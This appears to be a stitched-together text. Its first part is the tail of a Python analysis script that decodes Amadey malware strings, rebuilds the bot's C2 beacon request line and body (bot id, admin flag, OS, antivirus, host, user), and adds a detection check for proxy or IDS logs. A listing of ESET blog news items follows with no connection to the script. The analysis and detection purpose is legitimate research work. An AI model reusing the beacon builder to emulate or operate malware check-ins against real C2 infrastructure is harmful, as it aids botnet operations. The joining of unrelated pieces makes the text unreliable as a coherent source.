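    return struct.unpack("<I", bytes(encoded[:4]))[0]


def beacon_request_line() -> str:
    """Request line assembled from the decoded Post6, Script and Post1 strings."""
    s = decode_all()
    return s["Post6"] + s["Script"] + s["Post1"]


def build_beacon_body(bot_id: str, is_admin: bool, arch: str, lv: int,
                      os_code: int, av_code: int, host: str, user: str) -> str:
    """Concatenate the body in the order _Z6aBasici uses: Param0 id, Param1 Vers,
    Param2 admin flag, Param3 arch, Param4 lv, Param5 os, Param6 av, Param7 host,
    Param8 user, then a trailing '&'."""
    s = decode_all()
    return (s["Param0"] + bot_id + s["Param1"] + s["Vers"]
            + s["Param2"] + ("1" if is_admin else "0")
            + s["Param3"] + arch + s["Param4"] + str(lv)
            + s["Param5"] + str(os_code) + s["Param6"] + str(av_code)
            + s["Param7"] + host + s["Param8"] + user + "&")


def looks_like_amadey_beacon(body: str) -> bool:
    """Detection helper for proxy or IDS logs: a form body made of exactly these
    nine keys in this order and ending in a dangling '&' matches the builder."""
    if not body.endswith("&"):
        return False
    keys = [kv.split("=", 1)[0] for kv in body.split("&") if kv]
    return keys == AMADEY_KEYS


if __name__ == "__main__":
    for name, text in decode_all().items():
        print(f"{name:8s} -> {text!r}")
    print("TimeOut as little-endian DWORD:", timeout_ms(), "ms")
    # Constructed sample values, not taken from a real infection.
    sample = build_beacon_body("1234", False, "64", 0, 9, 3, "WS-01", "alice")
    print(beacon_request_line())
    print(sample, looks_like_amadey_beacon(sample))
```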
  64. The evolving landscape of data privacy: Key trends to shape 2025

    Thu, 23 Jan 2025 12:06:40 -0000

    Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams. As Data Privacy Week (January 27-31) and Data Protection Day (January 28) approach, it’s the perfect time to spotlight the critical role data protection plays in the success of modern organizations. In fact, privacy and data protection go … More: https://blog.eset.ie/2025/01/23/the-evolving-landscape-of-data-privacy-key-trends-to-shape-2025/
  65. ESET discovers new APT group and its supply chain attack on South Korean VPN service

    Wed, 22 Jan 2025 09:53:44 -0000

    ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a newly discovered and previously undetected China-aligned APT group that ESET has named PlushDaemon. In this cyberespionage operation, the attackers replaced the legitimate installer with one that also deployed the group’s signature implant, which ESET has named SlowStepper — a … More: https://blog.eset.ie/2025/01/22/eset-discovers-new-apt-group-and-its-supply-chain-attack-on-south-korean-vpn-service/
  66. Under lock and key: Protecting corporate data from cyberthreats in 2025

    Tue, 21 Jan 2025 12:05:23 -0000

    Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage. There were over 3,200 data compromises in the United States in 2023, with 353 million victims, including those affected multiple times, according to the US Identity Theft Resource Center (ITRC). Each one of those individuals … More: https://blog.eset.ie/2025/01/21/under-lock-and-key-protecting-corporate-data-from-cyberthreats-in-2025/
  67. Europe prepared strategy to protect hospitals from cyberattacks

    Thu, 16 Jan 2025 11:05:05 -0000

    The European Union is stepping in to help hospitals and healthcare providers combat increasing cyberattacks. According to Politico*, the European Commission has unveiled an “action plan” to enhance cybersecurity in the sector, which includes additional funding for securing hospitals’ technical infrastructure, guidance on applying existing rules like the EU’s NIS2 cybersecurity directive, and improved information-sharing. Since … More: https://blog.eset.ie/2025/01/16/europe-prepared-strategy-to-protect-hospitals-from-cyberattacks/
  68. ESET Research discovers UEFI Secure Boot bypass vulnerability

    Thu, 16 Jan 2025 10:28:03 -0000

    ESET researchers have discovered a vulnerability, affecting the majority of UEFI-based systems, that allows actors to bypass UEFI Secure Boot. This vulnerability, assigned CVE-2024-7344, was found in a UEFI application signed by Microsoft’s “Microsoft Corporation UEFI CA 2011” third-party UEFI certificate. Exploitation of this vulnerability can lead to the execution of untrusted code during system … More: https://blog.eset.ie/2025/01/16/eset-research-discovers-uefi-secure-boot-bypass-vulnerability/